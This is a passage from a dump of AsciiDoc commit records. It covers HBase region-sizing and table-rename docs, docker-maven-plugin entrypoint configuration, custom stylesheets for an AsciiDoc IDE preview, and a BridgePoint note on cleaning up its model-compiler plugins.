multiple tables, note that most region settings can be set on a per-table basis via link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. <<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))+\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS is a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workload, memstore fraction can be increased in configuration at the expense of block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node machine your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200MB data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor older 0.90.x codebase, the upper-bound of regionsize is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, experimental stripe compactions feature was added that would allow for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per regions.\nMinimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of the regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility renaming a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, String oldTableName, TableName newTableName) {\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f338bbc2b6aa781eefc87c64d942398ef59b37d","subject":"Fixed docs","message":"Fixed docs\n","repos":"scoplin\/docker-maven-plugin,fabric8io\/docker-maven-plugin,fabric8io\/docker-maven-plugin,vjuranek\/docker-maven-plugin,vjuranek\/docker-maven-plugin,fabric8io\/docker-maven-plugin,rhuss\/docker-maven-plugin,thomasvandoren\/docker-maven-plugin,vjuranek\/docker-maven-plugin,rhuss\/docker-maven-plugin,mattbetzel\/docker-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/misc\/_startup.adoc","new_file":"src\/main\/asciidoc\/inc\/misc\/_startup.adoc","new_contents":"\n\nUsing `entryPoint` and `cmd` it is possible to specify the https:\/\/docs.docker.com\/reference\/builder\/#entrypoint[entry point]\nor https:\/\/docs.docker.com\/reference\/builder\/#cmd[cmd] for a container.\n\nThe difference is, that an `entrypoint` is the command that always be executed, with the `cmd` as argument. If no `entryPoint` is provided, it defaults to `\/bin\/sh -c` so any `cmd` given is executed with a shell. The arguments given to `docker run` are always given as arguments to the\n`entrypoint`, overriding any given `cmd` option. On the other hand if no extra arguments are given to `docker run` the default `cmd` is used as argument to `entrypoint`.\n\n****\nSee this http:\/\/stackoverflow.com\/questions\/21553353\/what-is-the-difference-between-cmd-and-entrypoint-in-a-dockerfile[stackoverflow question] for a detailed explanation.\n****\n\nAn entry point or command can be specified in two alternative formats:\n\n.Entrypoint and Command Configuration\n[cols=\"1,5\"]\n|===\n| Mode | Description\n\n| *shell*\n| Shell form in which the whole line is given to `shell -c` for interpretation.\n\n| *exec*\n| List of arguments (with inner `<args>`) arguments which will be given to the `exec` call directly without any shell interpretation.\n|===\n\nEither shell or params should be specified.\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- shell form -->\n <shell>java -jar $HOME\/server.jar<\/shell>\n<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <exec>\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n <\/exec>\n<\/entryPoint>\n----\n\nThis can be formulated also more dense with:\n\n.Example\n[source,xml]\n----\n<!-- shell form -->\n<entryPoint>java -jar $HOME\/server.jar<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n<\/entryPoint>\n----\n\n","old_contents":"\n\nUsing `entryPoint` and `cmd` it is possible to specify the https:\/\/docs.docker.com\/reference\/builder\/#entrypoint[entry point]\nor https:\/\/docs.docker.com\/reference\/builder\/#cmd[cmd] for a container.\n\nThe difference is, that an `entrypoint` is the command that always be executed, with the `cmd` as argument. If no `entryPoint` is provided, it defaults to `\/bin\/sh -c` so any `cmd` given is executed with a shell. The arguments given to `docker run` are always given as arguments to the\n`entrypoint`, overriding any given `cmd` option. On the other hand if no extra arguments are given to `docker run` the default `cmd` is used as argument to `entrypoint`.\n\n****\nSee this http:\/\/stackoverflow.com\/questions\/21553353\/what-is-the-difference-between-cmd-and-entrypoint-in-a-dockerfile[stackoverflow question] for a detailed explanation.\n****\n\nAn entry point or command can be specified in two alternative formats:\n\n.Entrypoint and Command Configuration\n[cols=\"1,5\"]\n|===\n| Mode | Description\n\n| *shell*\n| Shell form in which the whole line is given to `shell -c` for interpretation.\n\n| *exec*\n| List of arguments (with inner `<args>`) arguments which will be given to the `exec` call directly without any shell interpretation.\n|===\n\nEither shell or params should be specified.\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- shell form -->\n <shell>java -jar $HOME\/server.jar<\/shell>\n<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <exec>\n <args>java<\/args>\n <args>-jar<\/args>\n <args>\/opt\/demo\/server.jar<\/args>\n <\/exec>\n<\/entryPoint>\n----\n\nThis can be formulated also more dense with:\n\n.Example\n[source,xml]\n----\n<!-- shell form -->\n<entryPoint>java -jar $HOME\/server.jar<\/entryPoint>\n----\n\nor\n\n.Example\n[source,xml]\n----\n<entryPoint>\n <!-- exec form -->\n <arg>java<\/arg>\n <arg>-jar<\/arg>\n <arg>\/opt\/demo\/server.jar<\/arg>\n<\/entryPoint>\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63a2a98713f87af1f01847abe112a1f0c20287e1","subject":"update docs to show version from where this is available from (#556)","message":"update docs to show version from where this is available from (#556)\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"doc\/users-guide\/modules\/ROOT\/pages\/features\/advanced\/stylesheets.adoc","new_file":"doc\/users-guide\/modules\/ROOT\/pages\/features\/advanced\/stylesheets.adoc","new_contents":"= Custom stylesheets for the preview\n:navtitle: Custom stylesheets\n:description: The user can provide custom stylesheets for the preview to make the preview look similar to the live site they publish the content to.\n\n{description}\n\n== Configuring stylesheets\n\nThis chapter walks you through the steps to prepare an _.asciidoctorconfig_ file to either replace the stylesheet or to add additional styles to the HTML header.\n\nThe _.asciidoctorconfig_ file will configure the preview of all AsciiDoc files in the folder where it is located and this folder's subfolders.\nSee \"`xref:features\/advanced\/asciidoctorconfig-file.adoc[]`\" for more details.\n\nWARNING: If the configuration references remote content like fonts or stylesheets, these will require an online connection for the preview to load them.\nTherefore, the user will not be able to work off-line anymore.\nConsider using a conditional like `ifdef` to provide an attribute for the user to switch off the custom stylesheets when they are offline.\n\n=== Replace default stylesheet\n\nThis replaces the standard stylesheet with a custom stylesheet.\nYou can use local content, or link to a remote stylesheet.\n\n==== Using local project's content\n\nNOTE: The stylesheet will be embedded in the preview, therefore relative links to the local file system will not work.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:stylesdir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:stylesheet: preview-stylesheet.css <2>\n----\n<.> point to a directory with the stylesheet. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> filename of the stylesheet to be used\n\n. Place your stylesheet in the _.asciidoctor_ folder\n+\n..asciidoctor\/preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\n==== Using a remote stylesheet\n\nNOTE: This is available from plugin version 0.31.31+.\n\nOnce the document or the configuration set the `linkcss` attribute, the preview will link to an external stylesheet and will no longer embed the stylesheet.\n\nApply the following steps:\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:linkcss:\n:stylesdir: https:\/\/example.com\/css\n:stylesheet: preview-stylesheet.css\n----\n. Host an external stylesheet +\nIn the example above, the preview will fetch it from \\https:\/\/example.com\/css\/preview-stylesheet.css\n+\n.preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\nThe https:\/\/github.com\/darshandsoni\/asciidoctor-skins[asciidoctor-skins] project hosts multiple stylesheets you can link to. The following example uses a dark skin.\n\n.Dark theme based on the asciidoctor-skins project\n----\n:linkcss:\n:stylesdir: https:\/\/darshandsoni.com\/asciidoctor-skins\/css\n:stylesheet: dark.css\n----\n\n=== Add additional styles or HTML headers\n\nThis adds additional styles in addition to the default stylesheet.\nThe chapter https:\/\/asciidoctor.org\/docs\/user-manual\/#docinfo-file[\"`Docinfo Files`\" in the Asciidoctor User Manual^] provides more information about this capability.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:docinfodir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:docinfo: shared <2>\n----\n<.> point to a directory with docinfo files. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> tell the renderer to include the shared docinfo file _docinfo.html_\n\n. Place your _docinfo.html_ in the _.asciidoctor_ folder\n+\n..asciidoctor\/docinfo.html\n[source]\n----\n<style>\nbody {\n \/* ... *\/\n}\n<\/style>\n----\n","old_contents":"= Custom stylesheets for the preview\n:navtitle: Custom stylesheets\n:description: The user can provide custom stylesheets for the preview to make the preview look similar to the live site they publish the content to.\n\n{description}\n\n== Configuring stylesheets\n\nThis chapter walks you through the steps to prepare an _.asciidoctorconfig_ file to either replace the stylesheet or to add additional styles to the HTML header.\n\nThe _.asciidoctorconfig_ file will configure the preview of all AsciiDoc files in the folder where it is located and this folder's subfolders.\nSee \"`xref:features\/advanced\/asciidoctorconfig-file.adoc[]`\" for more details.\n\nWARNING: If the configuration references remote content like fonts or stylesheets, these will require an online connection for the preview to load them.\nTherefore, the user will not be able to work off-line anymore.\nConsider using a conditional like `ifdef` to provide an attribute for the user to switch off the custom stylesheets when they are offline.\n\n=== Replace default stylesheet\n\nThis replaces the standard stylesheet with a custom stylesheet.\nYou can use local content, or link to a remote stylesheet.\n\n==== Using local project's content\n\nNOTE: The stylesheet will be embedded in the preview, therefore relative links to the local file system will not work.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:stylesdir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:stylesheet: preview-stylesheet.css <2>\n----\n<.> point to a directory with the stylesheet. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> filename of the stylesheet to be used\n\n. Place your stylesheet in the _.asciidoctor_ folder\n+\n..asciidoctor\/preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\n==== Using a remote stylesheet\n\nOnce the document or the configuration set the `linkcss` attribute, the preview will link to an external stylesheet and will no longer embed the stylesheet.\n\nApply the following steps:\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:linkcss:\n:stylesdir: https:\/\/example.com\/css\n:stylesheet: preview-stylesheet.css\n----\n. Host an external stylesheet +\nIn the example above, the preview will fetch it from \\https:\/\/example.com\/css\/preview-stylesheet.css\n+\n.preview-stylesheet.css\n[source,css]\n----\nbody {\n \/* ... *\/\n}\n----\n\nThe https:\/\/github.com\/darshandsoni\/asciidoctor-skins[asciidoctor-skins] project hosts multiple stylesheets you can link to. The following example uses a dark skin.\n\n.Dark theme based on the asciidoctor-skins project\n----\n:linkcss:\n:stylesdir: https:\/\/darshandsoni.com\/asciidoctor-skins\/css\n:stylesheet: dark.css\n----\n\n=== Add additional styles or HTML headers\n\nThis adds additional styles in addition to the default stylesheet.\nThe chapter https:\/\/asciidoctor.org\/docs\/user-manual\/#docinfo-file[\"`Docinfo Files`\" in the Asciidoctor User Manual^] provides more information about this capability.\n\n. Create a file _.asciidoctorconfig_ with the following contents:\n+\n..asciidoctorconfig\n[source,asciidoc]\n----\n:docinfodir: {asciidoctorconfigdir}\/.asciidoctor <1>\n:docinfo: shared <2>\n----\n<.> point to a directory with docinfo files. As this uses \\{asciidoctorconfigdir}, the folder is relative to the _.asciidoctorconfig_ file.\n<.> tell the renderer to include the shared docinfo file _docinfo.html_\n\n. Place your _docinfo.html_ in the _.asciidoctor_ folder\n+\n..asciidoctor\/docinfo.html\n[source]\n----\n<style>\nbody {\n \/* ... *\/\n}\n<\/style>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63f1b3dc8de07941d68bf58e5a721fc38ba99c87","subject":"job #11491 update int with code changes","message":"job #11491 update int with code changes\n","repos":"rmulvey\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,keithbrown\/bridgepoint,perojonsson\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc","new_file":"doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc","new_contents":"= Clean up model compiler projects\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nThe model compiler plugins need a refresh. This implementation documents cleanup\nitems handled as part of this work.\n\n== 2 Introduction and Background\n\n2.1 Background\n\nThe model compilers were first introduced as an external tool builder. An\nexternal tool builder is a flexible mechanism provided by Eclipse to execute\nprograms outside Eclipse during a build. Plugins were created to configure\nthese builders on project creation and assure that they remain up to date. This\ndesign was made without a full understanding of the Eclipse build platform as\nthere is no reason to use an external tool builder when the model compiler is\nitself shipped with the project. It creates messy files in the application\ndirectory in version control and does not provide much configuration\nflexibility. A custom builder provided by the model compiler plugin would be\nbetter.\n\nMore information about the introduction of multiple model compilers in\nBridgePoint can be found at <<dr-5>>.\n\nDocgen is another model compiler provided by BridgePoint, however it was not\nimplemented as a builder or external builder but through a context menu item.\nDocgen is logically a model compiler and it would simplify the interface to\npackage it as just another model compiler.\n\n2.2 Current model compiler flow\n\nCurrently, model compilers are invoked as two separate builders. First a builder\ncalled \"Model Compiler Pre-Build\" runs. This is a customized model export which\ninvokes the OAL parser, sets up the build space, collects all referred to data,\nremoves proxies and graphical instances and outputs one `.sql` file in the\n`code_generation` folder. In some cases pre-builder does not parse OAL (e.g.\nMASL export) and sometimes it does not run at all (if the OAL is fully parsed\nand no files in `models\/` are newer than the output file in `code_generation`).\nNext, an external tool builder gets invoked which points to the `xtumlmc_build`\nPerl script packaged with BridgePoint.\n\n== 3 Requirements\n\n3.1 Model compilers shall stop using external tool builders\n\n3.2 Docgen shall be implemented as a model compiler\n\n3.3 BridgePoint shall support multiple model compilers on a single project\n\n3.4 Project preferences shall be moved to the \"Properties\" menu\n\n== 4 Work Required\n\n4.1 Updating model compiler builders\n\nWith a move toward real builders, there is no longer any need for a separate\nbuilder for the pre-build process. Instead, model compiler builders inherit from\nthe `AbstractExportBuilder` class which provides the pre-build functionality.\nThe first step for any model compiler builder is to execute the `preBuild`\nmethod. For some builders (like the MASL builder) a parameter is passed to\nensure that no OAL is parsed during pre-build. Note that since pre-build is\ninherited behavior for every model compiler it will run first in every model\ncompiler in the build chain, however it still does all the checks to see if a\nrun is necessary. If multiple model compilers are enabled on a single project,\nit is likely that in the second model compiler pre-build that nothing will occur\nbecause pre-build was handled in the first model compiler pre-build.\n\nTake an example where docgen and MC-3020 are enabled on a project. If MC-3020 is\nfirst in the build chain, it will execute a pre-build, generate code and exit.\nNext docgen will invoke a pre-build but will see that no source files are newer\nthan the existing pre-build output and short circuit. The docgen builder will\nthen run and exit. On the other hand, if docgen runs first, pre-build will\nexecute (skipping OAL parse) and docgen will execute and then exit. Next MC-3020\npre-build will run and notice that the model is not parsed. In this case the\npre-build will recreate the output file. Then MC-3020 will generate code and\nexit.\n\nThis design assures that output will _always_ be present when necessary and that\nunnecessary pre-builds are avoided in the majority of cases.\n\n4.1.1 MC-3020\n\nAll of the MC-3020 based model compilers were consolidated into one plugin\ncalled `org.xtuml.bp.mc.mc3020`. The builder was updated to remove the\nfunctionality which sets up and invokes the external tool builder. Instead a new\nbuilder `Mc3020Builder` was introduced which first runs pre-builder, then\ninvokes `xtumlmc_build` and handles all of the input and output. The string\nidentifiers for the MC nature and builder have been changed. Legacy projects\nwith the old identifiers will need to be upgraded. See <<5 Implementation\nComments>> for more information.\n\n4.1.1.1 Preferences\n\nA new preferences page was added for projects configured with the MC-3020\nnature. The target language for MC-3020 can be configured. The default is C.\n\nimage::mc3020_prefs.png[mc3020_prefs.png,width=75%]\n\n4.1.1.2 CDT for MC-3020 projects\n\nDuring creation of an MC-3020 project or setting of model compilers, the\npreferences in the previous section can be set. Additionally, the project can\nbe converted to a C\/C{plus}{plus} project (adds the CDT nature and builders to\nthe project). The default for this option is unchecked. MC-3020 many times is\nused just for code generation and other C\/C{plus}{plus} build tools are\nrequired to build the source for the chosen target.\n\nimage::new_mc3020_project.png[new_mc3020_project.png,width=75%]\n\n4.1.1.3 `org.xtuml.bp.cdt` plugin\n\nThere used to be a plugin called `org.xtuml.bp.cdt`. Its only purpose in life\nwas to wait for projects to be created. When a project was created that had one\nof the MC-3020 flavor model compilers set, it automatically set it to a CDT\nproject. This plugin has been completely removed now that the functionality\nstated above is implemented.\n\n4.1.2 MC-Java\n\nThe MC-Java plugin was cleaned up and renamed from `org.xtuml.bp.mc.java.source`\nto simply `org.xtuml.bp.mc.java`. The MC nature and builder names were changed\nand updated in the source projects that use them. MC-Java was removed from the\nlist of available model compilers. It can still be configured manually by\nediting the `.project` file, but it is not used by BridgePoint users other than\nby the BridgePoint project itself, so it only confuses new users.\n\n4.1.3 Docgen\n\nThe `org.xtuml.bp.docgen` plugin was removed. A new plugin\n`org.xtuml.bp.mc.docgen` as introduced following the same pattern as the other\nMC plugins. The behavior found in the `Generator` class in the old docgen plugin\nwas adapted to work as a builder. The \"Create Documentation\" CME associated with\ndocgen is removed and instead it is executed during builds. Docgen is now\navailable in the list of model compilers when creating a new project or setting\nmodel compilers.\n\n4.1.3.1 Preferences\n\nA new preference page was added for projects configured with the docgen nature.\nThe output destination can be configured. The builder can be configured to open\nthe output file when finished. The defaults are the `doc\/` directory and to\nalways open the output. This mirrors current behavior.\n\nimage::docgen_prefs.png[docgen_prefs.png,width=75%]\n\n4.2 Delegating wizards\n\nA mechanism exists for creating new projects and setting model compilers called\n\"delegating wizards.\" The idea is that model compiler plugins can dynamically\ncontribute wizard pages to the new project wizard without re-building\nBridgePoint using an Eclipse extension point. This is very handy if users want\nto develop their own model compiler plugins and access them through the UI.\n\nBefore now, exactly one model compiler must be assigned to each project. This work\nextended the delegating wizard framework such that zero to many model compilers\ncan be assigned to any project. A project could have both docgen and MC-3020 or\na project could simply have no model compilers. With this change the \"None\"\nmodel compiler went away.\n\nimage::mcs.png[mcs.png,width=75%]\n\nOnce one or more model compilers are selected, if they have additional\nconfiguration, those wizard pages are added to the new project wizard.\n\nRead more about delegating wizards at <<dr-5>>.\n\n4.3 Console management\n\nModel compilers now get first class consoles. A utility class\n`ModelCompilerConsoleManager` was added to handle the common functionality of\ndealing with consoles. An output and error stream are opened to the console to\nwhich the `stdout` and `stderr` of the model compiler executables are piped. The\nerror stream prints to the console in red. This class also re-directs the output\nto Eclipse standard out and standard error for CLI builds.\n\n4.4 Project preferences\n\nProject preferences were moved to the \"Properties\" menu of a project. This is\nwhere most Eclipse tools handle project specific preferences but BridgePoint\nprovided its own CME. With this change, BridgePoint is much more like other\nEclispe based tools. The old project preferences CME was removed and the\n\"Properties\" CME was added for model explorer.\n\nimage::project_prefs.png[project_prefs.png,width=75%]\n\nimage::properties_cme.png[properties_cme.png,width=50%]\n\n4.5 General code cleanup\n\nCode was cleaned up where applicable.\n\n4.5.1 `org.xtuml.bp.mc.template`\n\nThe template model compiler plugin was removed. This provided a mechanism to\nquickly create new model compiler plugin projects. It is a good idea but it is\nnot being used and it currently does not work. It may be a future project to\nreintroduce something like the template plugin but for now it is simply\nremoved. Read more about when this was introduced at <<dr-5>>.\n\n4.5.2 `org.xtuml.internal.test`\n\nThe `org.xtuml.internal.test` plugin was removed. This test only had files\nwhich were used to test the old delegating wizard framework with respect to\ncreating new model compiler plugins using the template plugin. The delegating\nwizard framework has been updated and the template plugin has been removed so\nthese tests are deprecated. These tests are not run automatically and have not\nbeen run recently.\n\n4.5.3 BridgePoint CLI\n\nThe CLI plugin had to be updated to properly refer to the new model compiler\nplugins. An attempt was made to overhaul the CLI build so that it would be\nbetter, however there were problems affecting the BridgePoint build and these\nchanges were reverted.\n\n== 5 Implementation Comments\n\n5.1 Future enhancements\n\n5.1.1 RSL builder\n\nA future enhancement that could be made is to implement a generic RSL model\ncompiler. This would essentially just be an interface to `pyrsl`. See <<dr-6>>.\n\n5.1.2 Purely headless CLI build\n\nAs mentioned above, some work was done to make build purely headless. It ran\ninto problems, but there is no real reason this cannot be done. It is faster,\nlighter, and removes the requirement of a virtual frame buffer. See <<dr-7>>.\n\n5.1.3 Template plugin\n\nA new model compiler template plugin could be introduced as mentioned above.\nSee <<dr-8>>.\n\n5.2 Existing project migration\n\nWith this version of BridgePoint, projects currently using a BridgePoint model\ncompiler will need to be upgraded. Since this only affects Eclipse support\nfiles, the decision was made not to implement a migration tool or provide legacy\nsupport for older projects.\n\n5.2.1 Procedure\n\nUse the following procedure to update existing models. It is recommended that\nprojects that are not in revision control be backed up before an upgrade is\nattempted.\n\n. Right click on the project and select \"Properties\"\n. In the \"Builders\" section, select \"Missing builder\n (org.xtuml.bp.mc.*.export_builder)\" and click \"Remove\"\n. In the \"Builders\" section, select \"Missing Compiler\" and click \"Remove\"\n. Click \"Apply and Close\"\n. Right click on the project and select \"BridgePoint Utilities > Set Model\n Compilers\"\n. Follow the wizard to enable your desired model compiler(s)\n\n5.2.2 BridgePoint development projects\n\nThe BridgePoint plugin projects which use MC-Java have been updated to use the\nnew nature and builder 